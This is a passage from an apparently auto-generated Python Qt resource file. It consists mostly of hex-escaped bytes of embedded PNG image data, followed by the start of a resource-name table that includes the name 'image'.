\x6c\x8f\x1f\xe1\xed\xfb\xf6\xf8\x91\xb9\x2b\x0b\x1a\x87\xb2\x37\
\x6d\x61\x13\x08\x7b\x8d\x01\xc5\xdc\x8c\xcc\x55\x38\x4f\x69\x38\
\x1b\xf2\xa8\xb2\xc9\xb2\x19\x74\x8c\x22\x54\x9d\xe3\x70\xe7\x08\
\x0f\x8f\x75\x3d\x8b\x33\x1c\x64\x42\x16\xb6\x82\xce\x0b\x5b\x03\
\xf6\x62\xa2\x2e\xac\x02\x11\x88\x80\xd5\x44\xd1\x32\x11\x99\xc8\
\xd9\x9d\x0c\x5c\x0c\x73\xf5\x65\xe6\x5a\xb0\x54\x2a\x46\x46\x41\
\xfc\x97\xea\x54\xdd\x0d\x30\x0f\x22\x72\x2f\x9f\x7a\x97\xa3\xa2\
\x2a\x9c\x98\x73\x12\x16\x12\xa1\x1e\x89\xca\xaa\x26\xc2\xc4\xe2\
\x94\xf2\xb8\xdb\x4e\x77\xa6\xcd\xad\xcd\x70\xa6\x9a\xc0\x24\xc9\
\x53\xc2\x98\x79\xc8\x48\x8a\x9c\x48\x95\x52\xc6\x20\xc4\x40\x2d\
\x16\xca\x2c\x15\x1a\x06\xdd\x9e\xe5\x94\xdb\x3d\x11\xaf\x8f\x19\
\xcc\xac\x2c\xa8\x95\x58\x74\x33\xa4\xed\x98\x36\x9b\x3c\x8c\x59\
\x54\x42\xc3\xa9\x79\xd0\x3c\x10\x93\xa3\x18\x8a\xf9\x52\xbd\xce\
\x4b\x99\x0f\x75\x5e\x4a\x71\x17\x65\x61\x1e\xb2\x8a\xaa\xd9\x52\
\xab\x35\x12\xbe\xc7\x13\x2a\x87\xd9\x2e\x0f\x76\x71\x59\xf7\x0b\
\x9b\x01\x6e\x71\x80\xf4\xac\x06\x04\x3a\x55\x39\x84\x0d\x2e\x82\
\x88\xb1\x1f\x94\x35\x6a\x49\xb8\x7b\xa1\xea\xa3\xe6\xdd\xa8\xe3\
\x40\xbb\x91\xa7\x31\x7d\xed\xd5\x97\x5e\x78\xe1\x85\x9f\xff\xbb\
\xbf\xf2\xbd\x37\x5f\xbf\x7f\xff\x5b\x29\x43\x95\x88\x6a\xb5\xb9\
\xcc\x7b\x94\x92\x18\x83\xd4\xbb\x5b\x79\xfe\x66\x7e\xdf\x0d\xba\
\x7b\x6e\xcf\xec\x70\x77\xcb\xb7\x36\xf5\x46\xb6\x2d\x31\x1d\x1e\
\x7d\xf8\x85\x0f\xfe\xb3\x7f\xf2\xeb\x87\xc7\x0f\x3f\xfb\x5f\x3f\
\x93\x88\xa6\x9c\xb2\x0a\x13\xc1\x5d\x63\xb2\xf3\x2e\x5b\xcd\x3f\
\x3b\x00\x52\xde\x6b\x58\x7f\x7d\x2a\x0d\x3e\x41\xad\xf6\xfe\xfb\
\xdd\x20\x34\xfc\x94\x4a\xfc\x3d\x39\x38\x4f\x78\xad\xba\x51\x16\
\xf4\x84\xf2\x9d\xfa\xd6\xd4\x99\x0c\x04\xe2\x4a\x6c\x9d\xe4\x28\
\x14\x94\xf7\x10\x89\x84\xd6\x20\x3a\x52\x69\xba\xe5\xf8\xdf\x8e\
\x8a\x04\x61\xb5\x07\xb4\x64\xa9\xd3\x29\x13\xae\xa0\x65\x9f\xe2\
\xb7\xc2\x29\xab\x78\x65\xcb\x90\x9c\x38\xb0\xc8\x9b\x8a\xe7\x48\
\xbd\x65\x6e\x32\x79\xef\x99\x58\xe1\xb9\x0d\x6c\x54\xbf\xb5\x63\
\x87\xea\xf1\x5e\x6b\x41\x41\x2c\xe6\xae\x52\x88\x12\x80\x28\xa6\
\x44\x01\x02\x0c\xcc\xa9\xa7\xc6\xb6\xb9\x52\x5b\x5b\x7b\x0f\x50\
\x8f\x81\xb7\x48\xb3\x0f\x30\x8b\x30\x80\x6a\x15\xd4\x41\xc4\x81\
\x1d\x6b\x30\x89\x70\xa1\x67\x62\x61\x4e\x8e\xc8\x6d\x0e\xea\x6b\
\xe8\x01\x25\x46\x13\xdc\xa4\x9f\x0d\x79\x09\x27\x62\x73\x02\x93\
\x12\x85\x67\x3d\xd6\x24\xed\xd2\xea\x0c\xf2\x08\x68\x22\x6f\x44\
\x1a\x69\xc6\x21\x27\x62\x35\xaf\xdf\x7d\xeb\xad\xd7\xbe\xfb\xbd\
\x1f\x7d\xf6\x43\xef\xbf\xf7\x81\x71\xba\x51\x0e\x8f\x59\xda\x5e\
\x9d\x57\x2b\x75\x97\xc5\x76\x05\x2d\xaf\xf1\x47\x1c\x38\x22\x53\
\x5b\x2a\xaa\x58\x21\x15\x8b\x0c\x0f\xa6\x42\xc4\x06\xa9\x15\xa5\
\xd4\x65\xc6\x3c\x53\x2d\xc1\x5d\x8e\x37\x05\x19\xd8\xdd\x6b\x45\
\x0b\x7d\xec\xd6\xd0\xea\xa8\xd5\xa9\x4a\x4e\x39\x27\x9d\x54\xc6\
\x44\xa2\xb4\x66\xda\xc1\x79\x31\x3e\x1c\x20\x1e\x44\xe5\xe6\x85\
\xea\x75\x14\x9f\x22\x6b\xda\xda\x19\xeb\xb2\xc7\xdb\xf5\x77\x5c\
\xd3\xa0\x96\x4a\x24\x49\x7b\xd7\x01\xaa\xe0\x62\x58\xaa\x95\x4a\
\xa5\xa2\x18\x3b\x73\xbb\x6a\xd7\xdc\xde\xa6\x5c\x62\xe0\xba\x38\
\xa2\x37\x3e\xd2\x2e\x5d\x26\x09\xed\x25\x87\x3b\x20\x0d\xc3\xf4\
\xcc\xd9\xed\xb3\xb3\x1b\x4c\x5a\x17\x5f\x96\x72\x79\xb8\x7c\x78\
\xf9\xe0\xe2\xf2\xc1\x32\x3f\x22\xaf\x4c\x29\x2a\x37\x61\x17\x26\
\x76\x33\xd3\x52\x78\xde\x83\x18\xac\xc4\x8a\x6e\xf2\x68\x11\x50\
\x0e\xaf\xd5\xdd\x21\x22\x29\x31\xb3\x43\x9c\xc4\x23\x0e\x36\x84\
\x2a\xce\xd6\x94\xc4\x8c\x10\x71\x31\xb3\xb9\x55\x5b\xcc\x6b\x45\
\x61\x49\x4c\x62\x86\xf9\x50\x89\x88\xa5\x52\x50\xc3\x18\x14\xa6\
\x8d\x08\xf9\xe1\x00\xaf\x35\xeb\xa5\x2a\x37\x15\x3b\xae\x58\x79\
\x4e\x36\x90\xf1\x2a\x01\x88\xe5\x31\x77\xfd\x95\x4b\x4b\x2b\x95\
\x71\x90\x71\x2a\x9f\xfe\xec\x6f\xff\xdc\xdf\xfa\xd4\xaf\xfe\xd2\
\x3f\xff\x83\x2f\x7d\xfa\x8b\x5f\xfe\x8c\xcd\x8f\x93\x1c\x6e\x4f\
\x8b\xed\x68\x02\x3b\xcd\xd3\x46\x9e\xb9\x9d\x6e\xdd\x3c\xec\x26\
\x1b\x06\x61\x15\xb1\xba\x9f\xfd\xc6\x38\xd7\xdd\xf9\xdf\xf8\xe8\
\xa7\x7e\xe9\xe3\x9f\x7a\xf9\x8f\xfe\xf0\x73\x9f\xfb\xcc\x8d\x9b\
\x9b\xdd\x98\x86\x79\x4e\xcd\x8b\x48\x29\xe5\x44\xff\xff\xff\xad\
\x27\xdd\x29\x1e\x6b\xad\x95\xd9\xaf\x81\x99\x70\x85\x76\xb0\x32\
\x11\xed\xa4\x39\x78\x1a\x60\x0c\x6b\xf2\x28\x88\xf9\x87\x9f\xeb\
\x6d\x18\x42\x78\xaf\xcb\x60\xb5\x3d\x85\x7b\xa8\x50\x83\xbd\x74\
\x0f\x6d\x27\xe7\xe0\xe8\x94\xed\x82\x98\x50\xc6\x35\xaf\x87\x5c\
\xbb\x9a\xd6\xef\x21\x7a\xb7\x5f\xf6\xea\x2e\x22\x0e\x67\x46\xd8\
\xc4\xda\xa2\x75\x5d\x6b\xb4\x0f\x62\x5c\x8d\x81\x4a\x8d\xf0\x6a\
\x69\x99\x68\x5d\x66\xca\x6d\x46\x8f\x06\x79\x77\x30\xb3\x70\x8a\
\x01\xb9\x07\x00\x83\x25\xa8\x03\x44\xec\x30\x0e\x98\x4f\xfb\x37\
\x83\x4a\x15\x80\x30\x32\xf6\x78\x77\x47\xcb\xe5\x6e\xcc\xda\x20\
\x04\x8d\x47\xdb\x09\x2d\x68\x3e\x3d\xf7\x88\x68\xed\xa9\x95\x3d\
\x88\x5a\x85\x00\x01\x12\xb3\xc6\x75\xd2\x84\x3e\x14\x5a\x79\x6d\
\xeb\xde\x48\x21\x6d\x6b\x95\x3e\x9b\x43\x9f\xb6\xc5\x28\xa0\x6b\
\x65\x08\x4e\x2c\x50\x5f\x75\xa2\x7d\x0a\x10\x15\xbc\xbb\x0b\x31\
\xb9\x16\x77\x3d\x14\x7a\xfd\xed\xb7\x7f\x66\xb6\xbb\xdb\xbb\xe7\
\x67\xf7\xee\xdf\xbf\x58\x85\x54\xeb\x1b\x32\xae\x38\x3e\x4d\x26\
\x8b\x2b\xb2\x7b\x40\xdc\xc9\x2d\xd5\xc5\x7b\xd8\x54\x50\x8a\x40\
\x44\x06\x2f\x0b\xcf\xb3\xcf\xed\x70\x4f\x08\x51\xa8\x30\x8e\xa5\
\xbd\xc5\x3e\x40\xa2\xba\x22\x36\x23\xab\xac\x24\x39\xf1\x8d\x6d\
\x9a\x06\x1e\x07\x61\x81\xf4\x70\x48\x07\xb4\x28\xc9\xe0\xfb\x99\
\x43\xcf\x5e\xdb\x05\xe1\xa1\x92\x89\x63\xc4\x25\xc6\xee\xde\x93\
\x68\x7a\xfc\x77\x6b\x97\xd7\x77\x65\x2d\x11\xb5\x1b\xd3\x44\x23\
\xe2\xe2\xbc\x54\x2a\xc5\x0b\xb8\x18\x55\x67\x6b\xdb\x1b\x39\x7d\
\x6d\x63\x80\x86\xd3\x80\x4d\x34\xb3\x1c\x9f\x38\x0c\xbb\x21\x86\
\x89\x73\x4a\xf9\xc6\xee\xfc\xb9\x7b\xcf\xdd\x1b\x6f\x33\xa1\xd4\
\x3a\xf3\x21\x6b\x49\xbb\x61\xdc\x0c\xd3\xa4\x8f\x1f\xdb\x72\x78\
\xbc\xcc\x2e\x42\x0e\x62\x71\x56\xcf\xa3\x4f\xae\xb5\x24\x0a\x28\
\x51\x82\x64\x6a\x31\xf5\x20\x38\x9b\x99\xb9\x19\x0c\x80\x88\xa7\
\x1c\xa4\x3f\x87\x38\x27\x93\x64\x9a\x07\x1d\x44\x13\x83\x2a\xa8\
\x70\x1c\xee\xdc\x5d\x8b\x4e\xc5\xcd\xdd\xcc\xc8\x4d\xcd\xc9\x0c\
\xad\xf9\x66\xb0\x04\xfc\x80\x9c\xf8\xb0\xe0\xb0\xd4\xc3\x52\x97\
\x52\x23\x8a\xb2\x85\x02\x84\xbe\x6a\x8d\x5c\xef\x7a\xe7\x13\xd1\
\x04\xb9\xbb\xbb\x4b\xbb\xf2\x44\x89\x44\x2a\xb3\x11\xcc\xb9\xb0\
\x52\xca\xe6\xf0\xdf\xff\xdc\xbf\x7e\xe3\xdb\xff\xf7\xe7\x7f\xee\
\xd7\x3e\xfc\x97\xfe\xce\xe7\xbf\xf4\xef\x5e\xfa\xca\x7f\x7b\x70\
\x79\x7f\x3a\xf7\x74\x46\x49\xf5\xf9\x67\x6f\xbf\x78\xef\x7d\x37\
\x6f\x6e\xb3\xce\x87\xe5\xad\xcb\xf9\x7e\xbd\x7c\x78\x36\xed\xfe\
\xda\x4f\xfc\xbd\x8f\xfd\xd5\x5f\x39\x3b\x3b\xff\xbd\xcf\xfe\xce\
\x1f\x7f\xe5\xeb\x77\x6e\xdd\xda\xa6\x94\xd8\x06\xc2\x18\x86\x33\
\x66\xa1\x9a\xe8\x87\x57\xc2\x7c\x45\x9a\xd2\xfc\xd4\xb1\xbe\xd1\
\x2b\xb8\x95\x75\x95\xca\x9d\x00\x76\x45\x24\xb3\x2e\x82\x5a\xad\
\xb1\x6e\x2f\x4f\xf8\x30\x38\x2a\x32\xd7\x4d\x29\xf0\xf4\x8e\x02\
\x27\xd3\xf9\xab\x21\x19\x6b\xb5\xdb\x4c\xf3\x4f\x5e\x14\xb8\x82\
\xf8\xea\x8c\x9c\x75\x81\xcb\x27\xec\x62\x3b\x35\xad\x5e\xa1\xee\
\xb4\xb2\x8f\x4f\xa3\x24\xd6\xab\xed\x84\x64\x88\x13\x17\x2b\x4e\
\x58\x9b\xa7\xf3\x19\x3d\xf9\xdd\xbc\x2b\x53\xd7\x01\xf4\x71\xde\
\x43\xc7\xa8\x56\x62\xb0\xbb\x33\x43\x5a\x3a\xcc\x0a\xbf\x24\x1c\
\x8b\xab\x26\x93\x11\x16\x10\xdc\x42\x6e\x81\x10\xdb\x48\x83\x73\
\x05\xf3\x92\x4a\xad\xc2\x49\x39\xa1\x0d\x9d\x58\x54\xa9\x7d\xa3\
\x58\xb5\x4e\x2a\xf6\x66\x85\xef\x10\x82\x30\xec\xf2\x9a\x16\xde\
\x7f\x01\x6f\xa3\x0d\x72\x08\x38\xa1\x4b\x48\x03\x2c\x2e\xb4\xce\
\xf3\xd9\xdb\xfa\x6f\x2d\x13\xd1\xf5\x83\x62\x1c\x89\xb8\xc4\x9c\
\x08\xe4\x2d\xf1\x5b\x82\xcc\xd4\xe3\x8f\xe3\xdd\xb8\xc6\x71\x39\
\xc0\x0e\x76\x86\x0b\x04\x09\x90\xef\x3f\x7c\xf4\xf0\xd1\xe5\x0e\
\xf9\xfc\xec\xce\x83\xf4\x86\x91\xf5\xe5\x40\x37\x86\x45\x2e\x89\
\x44\xdb\x1d\xc5\x73\x2c\xe6\x48\x45\x08\xec\x95\xbd\x26\xaf\x6e\
\x0b\x59\xcb\x08\x8d\xdb\xd4\x2b\xbc\x2c\x5c\x16\x76\x4b\x9d\x45\
\x06\x51\x76\x32\x98\x38\xa8\x56\xf7\x48\x68\x8d\x53\x9f\x08\x44\
\xc5\x08\x90\xac\x34\x8d\xe9\xc6\x56\x73\x86\x6a\x0b\x20\x13\x16\
\x80\x83\xe0\x5f\x9d\x74\x61\x37\x67\xb6\xa4\xf1\xcf\x1b\x39\xb9\
\xb8\xaa\xc0\x3d\x68\xed\x71\x72\x1d\xe3\x60\x7b\xa6\x0a\xc8\x3d\
\xf4\x27\xa6\x44\x6c\x95\xe3\x2d\x46\x5d\x95\x09\x0f\x01\x52\xab\
\x23\x9a\x3b\x47\x74\xb5\x37\x85\x8e\x6c\xed\x79\xdd\x7b\x27\x0b\
\x36\xf3\x78\x60\x29\x67\x8f\x6c\x26\x66\x26\x55\x4d\xbb\xed\xcd\
\xe7\x6e\xbf\x78\x77\xf3\x4c\x76\x31\xaf\xe2\x94\x65\x80\xb0\x39\
\x53\xda\xd0\xee\x06\x7c\xef\x75\xae\xa5\xc4\xc1\x21\x4a\x0a\x62\
\xe6\x81\x79\x58\x7c\xa9\xb0\x62\x92\x59\x12\x11\x1b\x4b\x22\x27\
\x63\x37\xb7\x16\x4a\xce\x20\x36\x51\x21\x26\x49\xa4\x03\x62\x3a\
\x1a\xc3\x96\x36\x02\xed\x22\x7a\x26\x25\x17\x37\x72\xb0\x55\x77\
\x87\x13\x8a\xf9\x7c\x70\x55\x6a\xd4\x68\x81\x68\xbc\xa9\xbc\x56\
\x5c\xec\x6d\x7f\xf0\xfd\x5c\x96\x1a\x43\x29\xa8\x4a\x53\xbb\x39\
\xf7\xfe\x3e\x44\x74\x9d\x91\xd8\xb9\xb9\xee\xee\x56\xc3\xbd\xa6\
\x4c\xcc\x96\xb3\x6a\x2a\x2c\x6c\xb0\x4a\xa9\x98\x32\x74\x98\xf8\
\x1b\x7f\xf2\x85\xdf\xfd\xf7\x2f\xfd\x95\xbf\xfc\x89\x8f\xfd\xd4\
\x2f\x7e\xec\xaf\xff\xc2\x2b\xaf\xfd\xaf\x97\x5f\xfb\x83\x07\x8f\
\xbf\xfd\xec\x9d\x1f\xfb\xe0\x0b\x1f\xbd\xb3\x79\x9f\x8a\x33\xe6\
\xd9\x2f\x8a\xef\x87\xcd\xf6\xb9\xdb\x1f\x19\x74\xf3\x95\xaf\x7d\
\xe6\x4b\x5f\xfd\xbd\xf9\xa0\xf7\x9e\xff\xe0\x24\xdb\x71\xdc\x8e\
\x43\x1e\x86\x94\x73\xa2\x26\xb6\xe7\x3f\x6f\xe5\x8e\xa7\x84\x1e\
\x1d\x6b\xd5\xa7\x54\xaf\x2b\x65\xe4\x29\x60\xd5\x2b\xe2\x48\xeb\
\x20\xdc\xa7\x94\xba\xc7\x75\xdb\x93\x3b\xda\xf7\xb8\x9a\x18\xef\
\xfa\x08\xf8\xf8\xfb\x75\xfb\x70\xe8\x20\xb5\xd9\x30\x21\x91\xa8\
\x75\x95\x3c\x7c\xd2\x85\xb8\xb3\x68\x43\xbe\xc4\x67\x41\xae\x9d\
\xfe\x57\x6e\xf2\x1e\x08\x45\x4f\x3e\x45\x4d\x19\xb1\xea\x6a\x68\
\xcd\x6a\x5e\x65\xd7\xfc\x24\x48\x07\xce\xb1\xe2\x8a\xde\x11\xd5\
\x9b\xf5\xfc\x5a\xb8\x36\xb3\xbb\x21\xd8\xad\x51\x23\x37\xac\x8e\
\x01\xe4\x95\x98\x53\xac\x0d\xa9\xb5\x05\x41\x7b\x77\x62\x83\xab\
\x93\x37\xd6\x66\x33\xe2\x09\x9f\x10\x75\x72\x4e\xa8\xe4\x6e\xc4\
\x94\x34\xa1\x89\xf3\x43\x5f\x44\x22\xea\xa8\x10\x21\x90\x8b\xc2\
\x43\x53\x69\x60\xf7\x16\xda\x1c\x2d\x89\x18\x17\x27\x6f\xf3\x24\
\x0f\x25\x1c\x35\x7f\x2b\x08\x2e\xe1\x93\x27\x32\x90\x1a\x22\x7b\
\xd9\x11\x61\x40\x47\xaf\x81\xaf\x40\x0a\xb4\x34\x0f\x06\xc3\x0d\
\x23\x08\xd0\xfb\x6f\x3f\x78\xfb\xc1\xc3\x67\x6f\x0e\xbb\xdd\xad\
\x6a\x73\x7f\x79\x5b\x31\xd0\xf7\x4d\x6b\x36\x18\x09\x77\xa7\x3e\
\x73\x4e\x99\x99\xac\xc0\x2b\xdb\x82\xd0\x6d\x7a\x62\xd5\x36\xb0\
\x00\x4f\x42\x63\x2c\x08\x37\x83\xdc\x3c\xaf\xb0\xf9\x30\xef\x4b\
\xb5\x5a\xbc\x14\x94\x6a\xa1\x12\x21\xa2\x48\x1b\x72\xc0\x1c\xa2\
\x32\x8e\x69\x9a\x52\x4e\x10\x76\xc0\xe3\xe2\x8b\x85\x0f\x3b\x67\
\x46\xae\x9a\x87\x14\x4d\x4e\x62\xc0\xc8\x0d\xb5\x42\x2b\x2f\x33\
\xc1\x05\xe1\xad\x01\xc1\x7b\xce\x7c\x13\xce\x3a\x21\x56\xbd\x6e\
\xce\x5c\x02\xb7\xd6\x24\x63\xf1\x14\xa3\x0d\xa8\x91\x45\x50\x3c\
\xe6\x5f\x5d\x7a\x4c\x3d\xc5\x96\x70\x32\x3d\x44\x88\xa8\xba\x3a\
\x8b\xe1\x9c\x58\x13\xa5\x2c\x79\x94\x21\xeb\xb8\xc9\xd3\x76\xba\
\x75\x7e\xf3\xf6\xf6\xd6\xe8\xa3\xe1\x10\x8c\xa3\x90\x0a\x65\x4d\
\x4c\xce\x3a\x95\x71\x77\x48\x17\xb3\x54\x02\x54\xe3\x32\x55\x63\
\x01\x90\x37\x3c\x56\x5a\xc4\x25\x2b\x89\x1b\xcc\xdd\x8c\xb9\xb6\
\x36\xce\x01\x03\x99\x0a\x9c\xc0\x49\x59\xb1\x94\x19\x94\x3a\xdf\
\xb6\xa5\xab\x24\x4d\x14\x9c\x03\x71\xa2\x54\x2a\xd7\xea\xe6\x64\
\x8e\x5a\xcb\x3c\xf3\x61\x8f\x48\x2e\xe4\xe4\x2c\x24\xe6\x2c\x46\
\x84\x52\xb9\x14\x3b\x2c\x5e\x8a\x05\x09\x23\x54\xc2\xc7\x32\x2b\
\xf4\x27\x21\x3e\xf6\xda\xa6\xc7\x68\xda\x3c\xb3\x5a\x88\x45\x49\
\x58\x85\x9d\xc4\x40\xb3\xb5\x44\xdb\x64\x6e\x15\x29\xb1\x48\xf6\
\x94\xb3\x55\xfc\xcf\x97\xfe\xc3\x17\xbe\xfc\x9f\x7e\xf4\xc5\x9f\
\xfa\xe8\x8f\xff\xec\x27\x3f\xfe\x9b\x39\xdd\x51\xca\x4c\x46\xd5\
\x84\x34\x56\x84\x26\xb8\xb8\x7c\xf3\xd5\xd7\xff\xcb\xcb\xaf\x7e\
\xfa\xc1\x3b\xdf\xcf\x9b\xf3\xb3\x5b\x2f\x9c\xe9\x38\xb8\x8c\x59\
\xa6\x69\xb7\x19\x76\x22\x1a\xba\x3b\x77\xa4\x8e\x50\x13\xf0\x89\
\x71\xff\x3a\x7e\xab\xb3\x15\x5b\x8e\xb8\xf6\x15\xeb\x40\xbc\xe6\
\x4b\x50\x74\xe1\xdd\x4e\x89\x63\x4e\x1c\x42\x4f\x68\x5d\x38\x69\
\xbd\xea\xc6\xc9\x5b\x68\xb8\x3a\x97\x47\x4b\xa1\x64\x21\xd7\x53\
\x85\xe4\x31\x5e\xe1\xba\x37\xca\x57\xe6\x19\x3a\x3e\xb1\x1b\x08\
\x9d\x98\xc0\xda\xda\xee\x4e\x39\x64\x5e\x88\x74\xfd\xa6\x5e\x17\
\x7b\x17\xc4\x73\x23\x7a\xb5\x0f\xc9\x93\x27\xb2\x1f\x47\xfb\x6d\
\xb6\x73\x8c\x37\x6a\xcc\xbd\xe3\xcc\xf3\x24\xb7\xaf\x0f\x72\x8f\
\xad\xcc\xf5\x06\x03\x27\xcd\x90\xad\x86\xd9\x18\x1d\x04\xd9\xc7\
\x25\x62\xb9\x39\x91\x99\x59\x63\x38\x92\x34\xf9\x77\x27\x56\x02\
\x95\xd8\x98\x36\x1e\x56\xf1\x95\x8d\xaf\x24\x22\x91\x04\xc8\x0c\
\x50\x65\x66\x91\x14\x88\x6c\x49\xa9\xf5\x69\x46\xac\x00\x0a\x63\
\x0c\xa3\x86\x09\xc8\x5c\x59\x18\xf0\x52\x6b\xec\x4b\x89\x44\xdc\
\x9b\xea\x25\x0e\xf7\x6c\x91\xe3\x17\x2b\x45\x17\xa1\x1a\xb6\x81\
\xca\xe4\xf0\x81\x48\x20\x0e\x82\x3b\x09\x29\x47\x84\xa7\x1a\x6a\
\x65\xe3\x06\x4e\x83\x31\xa4\xe7\x1a\x11\x0a\x48\x98\x06\xa2\x98\
\xa4\x86\x9b\x69\xdd\xd2\x7b\x5c\x89\x4e\x44\xb1\xe8\x02\x1b\x43\
\x80\x22\x04\xf1\x8b\xc3\xc3\xd7\xef\x3f\xdc\xd1\xfb\xce\x86\xbb\
\xc8\xce\x55\x9d\x7a\x1e\x12\x21\x9e\xc0\xae\x1c\x88\xaa\x17\x9d\
\x53\x41\x39\x49\xd6\x98\xcf\xe6\xfd\x21\xa5\xcd\x02\xa6\x81\xdb\
\x78\x49\xd3\x79\xd6\x33\x22\xec\x2b\x96\x43\xae\x33\x91\xf1\xf9\
\x94\x46\x19\x1e\x5e\x5e\x5c\xd8\x65\x8d\x53\x35\x06\xf7\x41\x19\
\x0e\xcd\xa7\x33\x11\x8d\xca\x59\xdd\x9c\x88\x39\x67\xca\x03\xa7\
\xc4\x01\xf5\x2f\x86\x64\xa2\x56\xb5\x14\x41\x04\x4f\xa3\x16\x73\
\xa3\xac\x6c\x09\x42\x7e\x69\x4e\x9c\xe3\x23\xd6\x3c\x3e\x7d\x0f\
\x23\x22\xde\xf4\x61\x62\x95\x59\x1d\x14\xd0\x09\x26\x02\x0b\x54\
\x90\x45\x24\xa9\x83\xc4\x42\x5c\xe4\x7d\x59\xb5\x0e\xf8\xf5\xd8\
\x7a\x76\x84\xa8\xc7\xe6\x5a\x30\x64\x6c\x26\x19\x12\x29\x4c\x41\
\x59\xf2\x98\xc7\x4d\xde\x4c\x39\xdf\x18\x76\x89\x46\x22\x25\x1a\
\x99\x58\xb8\x26\x61\xd1\x60\x16\x31\x93\x8f\x69\x44\x80\x9b\x99\
\xc2\xa0\xa6\xca\xc1\x44\xd6\x44\x29\x47\x97\x63\xe0\x4a\x24\x0e\
\xb3\x40\x2d\x74\x2a\x03\x18\x60\xd3\xc4\xaa\x04\xd0\x61\xe6\x7d\
\xb1\x1b\x24\x4c\x89\x3c\x79\x15\x4b\xa8\xd5\x58\x60\x0e\xf7\x98\
\xbd\x4a\xb5\x48\xed\xb2\xc3\x61\xde\x5f\x62\x3e\xb0\xea\xe0\x48\
\x92\x2c\x62\xa7\x82\x12\xb3\x98\x15\x33\xb3\x02\x04\x2e\xd8\x6d\
\x55\x21\x35\x31\x71\x64\xaf\xf5\x5e\x39\x62\x81\x00\x77\x84\x9c\
\xb8\xe5\xf2\xa2\x8e\x49\x34\x31\xb1\x95\x5a\xf7\xa5\x88\xeb\x52\
\xc7\x0c\xd1\x04\x6a\x29\x11\xd0\xe1\x50\xec\x9d\x57\xde\xf8\xec\
\x83\xfd\xd7\x3f\xf2\xf0\x13\x1f\xb8\xfb\xd3\x93\xee\x54\x98\xb5\
\x02\x28\xb5\x2c\xf5\xe1\xe5\xfc\x83\xc7\x8f\xbf\xfb\xf6\xa3\xd7\
\x34\x0d\xc3\x66\x93\x52\xda\x0c\xdb\xdd\x70\xbe\xe1\x5b\x83\x4e\
\x39\x9d\xe5\x34\xaa\x28\x31\xbb\x99\x99\xff\x99\x2a\xf7\x3e\x81\
\x6c\x1c\xad\x6e\x97\x38\x21\x8e\xbd\x77\x10\xc7\x53\xeb\x67\xee\
\x47\x3c\xf8\x5d\xfa\x00\xbf\x0a\x91\x7f\xca\xaf\xf5\x34\xef\xeb\
\x53\x61\x91\xdc\x2b\xba\x6b\xcc\xe1\x2e\x24\x07\x9f\x78\x9c\xae\
\x36\x06\xab\xf9\xe7\x3a\xb2\xf8\x87\xac\xa0\xb1\xce\x99\x8e\x3b\
\x09\xea\x94\x98\xf6\xbc\x9d\xb4\xbd\x76\x6d\xdb\xda\x47\x7b\xa7\
\x9b\x0c\x3a\x8e\xb5\x5a\x2c\x05\x33\x5f\xe3\x1a\xd2\x13\x33\xac\
\x98\x8e\x44\xc8\xb5\x71\xc0\x01\x45\x1c\x6c\x06\x66\x34\x7a\x76\
\xfb\xf1\xd6\x55\xea\xd6\x0a\x60\x66\x82\xf1\x15\x74\x67\xc4\x65\
\x83\x89\xcc\xdc\xc9\x45\x08\x44\xa5\x14\x77\x0f\x30\x55\x3f\x02\
\xd6\xd6\x88\x69\x05\x2e\xae\x98\x87\x7e\xfd\x34\xd7\x65\xf4\x02\
\xee\xdc\x18\xc4\x91\xc5\xba\xa6\x9a\x84\x6b\xa9\xb3\x11\xe9\xf8\
\xdc\x35\x46\x1d\x1f\x91\x88\xb4\x0e\x8b\x1a\x11\xc2\x41\xee\x82\
\x79\x39\x7c\xf3\xfe\xfd\xbf\x70\xe3\xd9\x9b\xe7\x77\xb7\xbb\x1b\
\x87\x77\x2e\x3b\x1f\x7f\x6d\xb3\x78\xd5\xad\x26\x55\x6d\x9c\x2d\
\x56\x86\x38\x54\x04\xf0\xcb\xcb\x3a\x3e\x86\x64\x87\x67\x32\x68\
\x92\xa4\xa3\xdb\xb6\x98\x94\x52\x97\xc5\x2f\x2f\xe7\xcb\x4b\x94\
\x59\x51\x41\xce\x49\x36\xa0\xe5\x34\x36\x32\xd0\x24\x31\x27\x21\
\xf2\xb0\xb9\xc6\x73\xab\x89\x86\x0d\x8d\xa3\xe7\x44\x14\x96\x4a\
\x43\x3d\xd4\x34\x96\x11\x16\xda\x3b\x37\x21\x62\x63\x90\x90\x54\
\x61\x66\x33\x2e\x25\xe6\x62\x11\xcc\x72\xcc\xcd\xc1\xf1\xa9\xe2\
\xd5\x9c\xe1\x0d\xb7\x09\x09\x25\x63\x4a\x22\x62\x44\x4e\x9c\x22\
\x64\xae\xb1\xe2\xd7\x27\x84\x4f\x1a\xe8\x36\x8e\x89\x5f\x59\x45\
\xc6\x41\x93\x52\xec\x89\xe0\xdc\xf1\xe9\xae\x2c\xcc\x82\xe6\xca\
\xe0\x63\xf4\x6f\x93\xb4\x49\xb0\xce\x3c\x2c\x20\x02\xc2\x49\xac\
\x4d\xe4\xb0\xa8\xa8\x36\x9e\xb1\x99\x55\xab\xab\xbf\xfb\x48\x75\
\x69\xc4\x34\x73\x67\x66\x5d\x8a\x9b\x33\x4c\x2a\xc8\x13\x1c\x4b\
\xad\x96\x92\xb8\xfb\x52\xab\x59\xcb\x6f\x35\xb3\xb2\x2c\x97\xfb\
\xfd\xc5\x85\x79\xcd\x39\x07\x1b\xbe\x8a\x92\x68\x68\xac\xdd\x8e\
\xf3\x06\x3c\x79\x06\xb5\x2a\xad\x8b\xc8\xb8\xc1\xdb\x4d\x45\xc7\
\x71\x1c\x52\x84\x46\x41\x95\x87\x21\x0d\x89\x34\x33\x69\x95\x64\
\xc4\x5e\x6a\xb9\xb8\x5c\x58\x98\x77\x29\xe7\x0c\xbb\x74\x08\xa8\
\x8a\xf2\x33\x77\x5e\xf8\xd0\xfb\x7f\xfa\xf6\xee\x39\x9f\x0f\x17\
\x78\xe8\xa8\x31\x2f\x05\xbb\xd3\xc2\x8e\x71\xd8\xee\xa6\x7b\x97\
\xf3\xf7\x0f\xcb\xa5\xea\x34\xa4\x21\xa7\x71\x90\x6d\xd6\x6d\x4e\
\x63\xce\x43\x7c\x9c\x5d\x55\xcc\xfe\x74\x00\x53\x2d\x49\x0e\x4d\
\x02\x3e\x6d\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x05\
\x00\x70\x37\xd5\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
